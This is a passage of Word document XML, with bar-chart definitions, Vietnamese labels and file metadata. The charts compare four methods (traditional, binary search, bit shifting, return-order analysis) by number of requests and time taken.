                <c:pt idx="3">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-E9CD-42E1-BE12-D7595EBF7315}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Thời gian</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$5</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Truyền thống</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Tìm kiếm nhị phân</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Dịch bit</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Phân tích thứ tự trả về</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$D$2:$D$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>144</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>38</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>14</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-E9CD-42E1-BE12-D7595EBF7315}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="240076672"/>
        <c:axId val="240102784"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="240076672"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="0"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="240102784"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="240102784"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="240076672"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18"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Sheet1!$B$7</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$8:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Truyền thống</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Tìm kiếm nhị phân</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Dịch bit</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Phân tích thứ tự trả về</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$8:$B$11</c:f>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-536C-4FE0-988A-2469A29DED40}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$C$7</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Số lượng yêu cầu</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$8:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Truyền thống</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Tìm kiếm nhị phân</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Dịch bit</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Phân tích thứ tự trả về</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$C$8:$C$11</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>946</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>224</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>196</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>28</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-536C-4FE0-988A-2469A29DED40}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$D$7</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Thời gian</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$8:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Truyền thống</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Tìm kiếm nhị phân</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Dịch bit</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Phân tích thứ tự trả về</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$D$8:$D$11</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>2152</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>579</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>509</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>102</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-536C-4FE0-988A-2469A29DED40}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="244439296"/>
        <c:axId val="244646656"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="244439296"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="0"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="244646656"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="244646656"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="244439296"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
    </c:legend>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr>
          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
          <a:cs typeface="Times New Roman"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2BD78-0076-43A5-900C-775993338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Pages>
  <Words>20281</Words>
  <Characters>115606</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 Bach</dc:creator>
  <cp:lastModifiedBy>Nam Ha Bach</cp:lastModifiedBy>
  <cp:revision>725</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-05T01:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-08-24T03:42:00Z</dcterms:modified>
  <dc:language>en-US</dc:language>
</cp:coreProperties>
</file>